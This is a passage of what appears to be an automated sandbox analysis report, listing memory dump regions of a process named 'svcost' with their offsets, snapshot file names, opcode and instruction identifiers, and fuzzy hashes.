                                                                                                • Opcode Fuzzy Hash: bbb9b21ee6cb1410e66610ca4617bb2b5bc8b105bbe0460d788d32427fff2818
                                                                                                • Instruction Fuzzy Hash: F721CF70A047549FDB29DF69C844ADEBBF5FF88350B104A6DE486A7290DB70A884CB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a27b42e56926cf865cfa3b37cb046490af7963cc3a905c7a427660824fe17566
                                                                                                • Instruction ID: 338fe8e83c29952d327a0192c896d11e1ec895cedeb7706d3a40aeac0c1ca062
                                                                                                • Opcode Fuzzy Hash: a27b42e56926cf865cfa3b37cb046490af7963cc3a905c7a427660824fe17566
                                                                                                • Instruction Fuzzy Hash: 62211974D08209CFCB04EFAAD4846AEBBF5FB84301F2081A9D816A7344D7349A82DF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f94b80e944ef68194500e8db266cd67bc30cf8c7b3235ff1a7c1db39c5275244
                                                                                                • Instruction ID: 54aec9d8470e69b402e80470c74ae4425987d236301e350d15efc668d09efcd3
                                                                                                • Opcode Fuzzy Hash: f94b80e944ef68194500e8db266cd67bc30cf8c7b3235ff1a7c1db39c5275244
                                                                                                • Instruction Fuzzy Hash: 8621F2B4D04259DFDB41DFA9D840AAEBFB1AF49310F0480AAE818E7351D7348A41DFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e06614c5ca6291e23eba7aee5df62cf09159dc0b42484eaa3e977ee25de01e9
                                                                                                • Instruction ID: 1d6c4a6af6d6c40635640afa9b5528c7b8cb1bade19f60cbe4b33d2328a8906a
                                                                                                • Opcode Fuzzy Hash: 8e06614c5ca6291e23eba7aee5df62cf09159dc0b42484eaa3e977ee25de01e9
                                                                                                • Instruction Fuzzy Hash: 2A11B230B043249FCB64EF7889547BA7BE2EBC9700F10842AE945DB280DA71C802CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f4d053ebc98b21ff62652e0468edf25859046acea9be495c6af8fd1bbfc0ff49
                                                                                                • Instruction ID: 0efd36039df98f858f9fade6364b1d58962fb379acc455a236f4a36f39f9c6ad
                                                                                                • Opcode Fuzzy Hash: f4d053ebc98b21ff62652e0468edf25859046acea9be495c6af8fd1bbfc0ff49
                                                                                                • Instruction Fuzzy Hash: 6011F674D04219DBCB09DF99E8446EEFBB9FF8E310F10802AD505B3210D7745A85CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9aa935858c72e30eca3ec1e0302fdf1ba478074c9296a04618c2291a6182ad6
                                                                                                • Instruction ID: fb896d4fc2c41e6c569bfb59a068d30e9b2a6db595d6d94a2735f1f48950d40e
                                                                                                • Opcode Fuzzy Hash: f9aa935858c72e30eca3ec1e0302fdf1ba478074c9296a04618c2291a6182ad6
                                                                                                • Instruction Fuzzy Hash: 5B01493220E3958FEB5597398C554D6BF93DEE3651318C6BFD04A8B153C865484BC392
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Opcode ID: 25c6f3c76e21fc03f550b3746a2f7e4ed97cf6fafc33d3c07656c96b6d660a51
                                                                                                • Instruction ID: a3ae7a60fe038bbbcef27e5e495269388e359ddd92880799a394d22b990be3f9
                                                                                                • Opcode Fuzzy Hash: 25c6f3c76e21fc03f550b3746a2f7e4ed97cf6fafc33d3c07656c96b6d660a51
                                                                                                • Instruction Fuzzy Hash: CF01F270A19618CFCB14DFA6CA89AECB7F5BF49301F1092A5A00EAB252D7348E45DF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73f717f7fc8adceeaf55a097cb079a35fd6c4a71a0d137f02d507e8ce0465e53
                                                                                                • Instruction ID: cbfb0bb995a58c59cad4cbe1432a5408d505eddd3147edd9376581fed18129aa
                                                                                                • Opcode Fuzzy Hash: 73f717f7fc8adceeaf55a097cb079a35fd6c4a71a0d137f02d507e8ce0465e53
                                                                                                • Instruction Fuzzy Hash: A3F0E731C0021AEBCF01DF99D8149EEBB75FF89324F10C519E95827210D732AAA6DB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ddddf8465d1fd4762969b0e84ecf3eedd5048679aca3a97e7b7a886b6fe5ae53
                                                                                                • Instruction ID: ecd2ad701c7b4d04aed6a232f0707eecc1fdde96f57fc4d2d532d0680dcb4179
                                                                                                • Opcode Fuzzy Hash: ddddf8465d1fd4762969b0e84ecf3eedd5048679aca3a97e7b7a886b6fe5ae53
                                                                                                • Instruction Fuzzy Hash: ADF0EC3190070A9BCB14DFA9D8549D9F7B4FF89314F10D669D55837600E731AA96CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ab2a3da8c308505a3567bc016536d28f071c418f2a73bb0e7d25775c1858fdc
                                                                                                • Instruction ID: 65e0c7d45258efe14941a3529c55a28a0e641c25001aacb96447941df212e2df
                                                                                                • Opcode Fuzzy Hash: 4ab2a3da8c308505a3567bc016536d28f071c418f2a73bb0e7d25775c1858fdc
                                                                                                • Instruction Fuzzy Hash: 86F06D70904248EFCB41CFA8C950AADBFF4FB49310F14C4DAE858D7251C2358A15DF10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03dafdcea9bb0e27f8a8c113fa8578d6afba91b00476049abcffda0e1cee7e97
                                                                                                • Instruction ID: 40e8eccdbba4e3e472a5e4a13afc37ef62e7de666510772ea4a96084a3d6635f
                                                                                                • Opcode Fuzzy Hash: 03dafdcea9bb0e27f8a8c113fa8578d6afba91b00476049abcffda0e1cee7e97
                                                                                                • Instruction Fuzzy Hash: ECF09030809288AFCB02DFA4D8249A97F35EF07300F5880DAEC9457262C632A916EB53
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d0148978ce4be6421adda131e3808f7ee2d4990f76613b0941f58d063f39245e
                                                                                                • Instruction ID: c52b755c36aae59552e137d18a54129d6a3f10b0050cf5ca5cf4662876f9b629
                                                                                                • Opcode Fuzzy Hash: d0148978ce4be6421adda131e3808f7ee2d4990f76613b0941f58d063f39245e
                                                                                                • Instruction Fuzzy Hash: 18F09034909288EFCB02CBA9D4509ACBF70EF46300F18C1DED88597792D2315E05DF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad8b0dbf42651b51d8ebe316867c07099eeee84581c19f0f4c55bd6691655195
                                                                                                • Instruction ID: de515400db849e9cc9b7867dec79d27492469e0dc9616a4e82fbd7a47dc15db0
                                                                                                • Opcode Fuzzy Hash: ad8b0dbf42651b51d8ebe316867c07099eeee84581c19f0f4c55bd6691655195
                                                                                                • Instruction Fuzzy Hash: 1EE0D83060CBA1BECB560F302F102257F957A8618070899BA8406CB5D2EE20F4008E21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 45d6f77e9d33cb921cfb4456ec2d331c162b4ab0d63981b1355d7b4ce9094472
                                                                                                • Instruction ID: 7c224fc3035e42af7994e8afadda1fc6463a2e27e00e0ec5ef1bbd1096875315
                                                                                                • Opcode Fuzzy Hash: 45d6f77e9d33cb921cfb4456ec2d331c162b4ab0d63981b1355d7b4ce9094472
                                                                                                • Instruction Fuzzy Hash: B0F0E530409248AFC305CFA8EA6159CBF74EB4B300F0481E9D88447342C6325A07CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c54496bf08075182ece6d083f531009a287653fc4be4dc8193d27efdbbcb050
                                                                                                • Instruction ID: 1ceffdca60e3c95f8bf5a5070b9af7b282ebfe792572491d9967125ee03df610
                                                                                                • Opcode Fuzzy Hash: 1c54496bf08075182ece6d083f531009a287653fc4be4dc8193d27efdbbcb050
                                                                                                • Instruction Fuzzy Hash: 10F01D3494D388DFCB01DFB5E56499DBFB0EF4A200F1445EAD885D7662C6355944DF02
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dadd3e8e78409ed3dcb6b57eddd9eba5927889eba59b029c6c76ef9e129473a4
                                                                                                • Instruction ID: 9d1a9e2b6cb35c167738bd052aebea4eb76bf3be21b4f44f3148786c07cd825f
                                                                                                • Opcode Fuzzy Hash: dadd3e8e78409ed3dcb6b57eddd9eba5927889eba59b029c6c76ef9e129473a4
                                                                                                • Instruction Fuzzy Hash: 34014B74D012688FDB65DF18D9847DDBBB5BB09301F1051EAE809B2250D7756F84CF01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f09ed94d9560dc91795ecb0c7d4e860472d564e3010c2e3cafb8e86a5fc9869
                                                                                                • Instruction ID: 1ce4690dc9368982acf99ed379b0274ea51663f61ede5ccf82f38b1bdc7e9588
                                                                                                • Opcode Fuzzy Hash: 6f09ed94d9560dc91795ecb0c7d4e860472d564e3010c2e3cafb8e86a5fc9869
                                                                                                • Instruction Fuzzy Hash: 91F0303480A348EFCB159FA4E8145ADBFB1EF46350F1092EAD88167252C7310A55DF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73f1d17b50e55ac4caff906ee50f7cc89ed03ca209d9e6dbe1152a947f45dfb6
                                                                                                • Instruction ID: fa279156b092b7c52dff7bc580f120d78e979ed3fd3eef9e2c8be31d34c1342e
                                                                                                • Opcode Fuzzy Hash: 73f1d17b50e55ac4caff906ee50f7cc89ed03ca209d9e6dbe1152a947f45dfb6
                                                                                                • Instruction Fuzzy Hash: 9BF0653050A3889FD703F7B45911A997F75DF47244F9940F2D554C7163D9351D0987A2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 237e110b7e925e94ce68499b8748b1cca1b756bc871809182b6fc8f9e3a5db6c
                                                                                                • Instruction ID: 5b756953bb99d12a8f18bd5d25ba0412f3774c4556371b528a838389f4ff76be
                                                                                                • Opcode Fuzzy Hash: 237e110b7e925e94ce68499b8748b1cca1b756bc871809182b6fc8f9e3a5db6c
                                                                                                • Instruction Fuzzy Hash: EDF05E3090A3449FC745DFA4C95599CBFB0EB49200F04C1EA8858D7252D6359A06CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8b5faa8295e436b6d760917d3ed639f76674c5c1bf2c81c486008727f45971ce
                                                                                                • Instruction ID: 74da25f25706c18c13b9ca45b1c93ed8b73af2d8ea6c93126f1dafbe558d1305
                                                                                                • Opcode Fuzzy Hash: 8b5faa8295e436b6d760917d3ed639f76674c5c1bf2c81c486008727f45971ce
                                                                                                • Instruction Fuzzy Hash: 2EF0A034409348EFC701DFA4D9599A8BFB8FF0A310F0090E6E8849B322C3316955EF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e3a3a4e06b5b0ad6117a7caf84e9676b3676b6e8a36f1b238eaaf065a7ae0d6b
                                                                                                • Instruction ID: f4240d54c9d38025e21c263aca1b3fe91278bb117930d19f2cc8165715a46366
                                                                                                • Opcode Fuzzy Hash: e3a3a4e06b5b0ad6117a7caf84e9676b3676b6e8a36f1b238eaaf065a7ae0d6b
                                                                                                • Instruction Fuzzy Hash: 11F0F274D04248AFCB90DFA9D954AAEBBF8EB49310F14C0AAA869D3241D6369A11DF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a6629b4fa5c1ac91a5690fe4a044fcbe54867d78203a438d1ff6db622796a8f
                                                                                                • Instruction ID: 2c4383da9dd228b8dd2fb4e8701a854042359f4c715cbf6adee8e52aa4239619
                                                                                                • Opcode Fuzzy Hash: 2a6629b4fa5c1ac91a5690fe4a044fcbe54867d78203a438d1ff6db622796a8f
                                                                                                • Instruction Fuzzy Hash: 0EF08C35905244EFCB01CFA4DA10AADBFB4EF4A310F1480EAD9149B362C3318A05EF21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a21e25361b80048b4cd29a7459fb8a96ddd1689162dbbbf82dfea36fdf2fe1a1
                                                                                                • Instruction ID: 61d69c58b15310f15a1c6df1689e07e6aafc925adcad91ab3d2b0f320452eead
                                                                                                • Opcode Fuzzy Hash: a21e25361b80048b4cd29a7459fb8a96ddd1689162dbbbf82dfea36fdf2fe1a1
                                                                                                • Instruction Fuzzy Hash: 13F02B3490D3C49FC701EB64E85096CBF759F47300F1881DAC8448B3A2C6354D06CB65
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                • Opcode ID: 724fcf4fa12a4a928eee8d9dca89e43806eccde922694eb4e275d9b988c79e7e
                                                                                                • Instruction ID: 72df878701a48874a9114f108ab4d85095254e737bab353cea11f84ba88ab140
                                                                                                • Opcode Fuzzy Hash: 724fcf4fa12a4a928eee8d9dca89e43806eccde922694eb4e275d9b988c79e7e
                                                                                                • Instruction Fuzzy Hash: 82E0927490E3448FCB05CFA0F92459CBF70EB47304F2481EBD8585B352C6324A06CB11
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4925952efbe872929086d0b98c05d70dcf63858a86418cd0846146ab63c7f78f
                                                                                                • Instruction ID: 6d9965aa4b42c4783e544e1e630b4796d0b7c1405a147465e8fd0138cda5a0e4
                                                                                                • Opcode Fuzzy Hash: 4925952efbe872929086d0b98c05d70dcf63858a86418cd0846146ab63c7f78f
                                                                                                • Instruction Fuzzy Hash: 9BE01231B28A27FF5B684E79AA40B36B3DE7B886503446475A406C7541FB30F850DE95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 99f425c2596124bde799761b129b6a3b6ace2a42d66d01daf9045326f71f1b12
                                                                                                • Instruction ID: 1658f89a9b1cd1b43371381fa7930c4e455e45aa213fbb64a30db3bc97feaf04
                                                                                                • Opcode Fuzzy Hash: 99f425c2596124bde799761b129b6a3b6ace2a42d66d01daf9045326f71f1b12
                                                                                                • Instruction Fuzzy Hash: 4AE0923040A388DFC702DBB89925ABD7F7CAF0B300F0090EAC44493212C6301945E756
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1557af0f3831a7527ce5ae6cf1a387d8097c1cedcd2d370ba6b87af42e1b5c31
                                                                                                • Instruction ID: 560a3e449a5970c3becfdc4262e4686acccc960a1baae676ba4b87afe7bad91f
                                                                                                • Opcode Fuzzy Hash: 1557af0f3831a7527ce5ae6cf1a387d8097c1cedcd2d370ba6b87af42e1b5c31
                                                                                                • Instruction Fuzzy Hash: F7F03030A191849FC741DB78D95579CFFB4FF0A205F1455E9C808A3242D7326A51CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dab4f627f0ae4b3a35f45c3ad2f2d8a6369ad7da4a3d71550e4d3e8077241108
                                                                                                • Instruction ID: c2e2043b19863f17bc4383299ea5abe136a0f9033a286787713b13da333629de
                                                                                                • Opcode Fuzzy Hash: dab4f627f0ae4b3a35f45c3ad2f2d8a6369ad7da4a3d71550e4d3e8077241108
                                                                                                • Instruction Fuzzy Hash: EBE06D7090E388AFCB02DBB59C616ADBFB1DF82200B5586EED445DB292DA301E09DB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 27a5f68b72071e549fe2dc66de0a4abe992cd649eb8ca7af536c778176161c75
                                                                                                • Instruction ID: 7c40f64850f1c470421bd7841479b226fa3185885946533f473b7580637b64e4
                                                                                                • Opcode Fuzzy Hash: 27a5f68b72071e549fe2dc66de0a4abe992cd649eb8ca7af536c778176161c75
                                                                                                • Instruction Fuzzy Hash: 60E06D7090A2848FCB05CBA49A6496CBF31AB47304F1481DEC40557293C6364A06CB56
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c741f9e61e3b5a8cb46be855f46acc07377ca1beba2b2a27270906494bae6fea
                                                                                                • Instruction ID: 38c5357937ae8c293e5aed3a57924d21b3ce2182c5a3e17e711d796ced08bbd4
                                                                                                • Opcode Fuzzy Hash: c741f9e61e3b5a8cb46be855f46acc07377ca1beba2b2a27270906494bae6fea
                                                                                                • Instruction Fuzzy Hash: C1E0822070CB814FC762833AAC2604A7FE28B86A01305C6AAC0C6CB2A6DD20CD078722
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70db889f35ad44fa37aa8cdc1041670fc71b462fe947f7ed160c448a22d74679
                                                                                                • Instruction ID: 66fd33a65a53342e9457e7eeb1ba9fe9990f141b0ca574c772334663aee5b88e
                                                                                                • Opcode Fuzzy Hash: 70db889f35ad44fa37aa8cdc1041670fc71b462fe947f7ed160c448a22d74679
                                                                                                • Instruction Fuzzy Hash: ABE06D30896249EFCB40EBB89959B9DBFB4FB06310F2042ADC406A3221D7340A50CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8fe483d95c2c0b769281d75a617748cd0ad9b0181bc67b9ae5261cb6a26ef80a
                                                                                                • Instruction ID: 1cc8a106af100c8a97202dd93c931e448089dee4c04568c4921171bf76418b8a
                                                                                                • Opcode Fuzzy Hash: 8fe483d95c2c0b769281d75a617748cd0ad9b0181bc67b9ae5261cb6a26ef80a
                                                                                                • Instruction Fuzzy Hash: 8BE0EDB0A092849FDB02DBA0DA15A5CBFB4EB86350F2482DDC80463282C7324A0ACF01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: 6edd0518166c6a120d2c6ad9a26a479a611b6d054a1ee74139c0737542763172
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: 12E0C974D05208EFCB44DFA8D555A9DFBB5EB48304F10C1AA9C1993340D7329A52DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction ID: 0cef4bb9bb896612ddd20f8f82756cb1e948d9b61d7e9b4a8fc2ed47176a4091
                                                                                                • Opcode Fuzzy Hash: 5b18e39c2893a272826dbbf9acbc1d00d790a13e31d7d79c8d4f40d2fb8127ca
                                                                                                • Instruction Fuzzy Hash: CCE0C974E05208EFCB44DFA8D555ADDFBF5EB88300F10C1AA9C1993340D6329A52DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
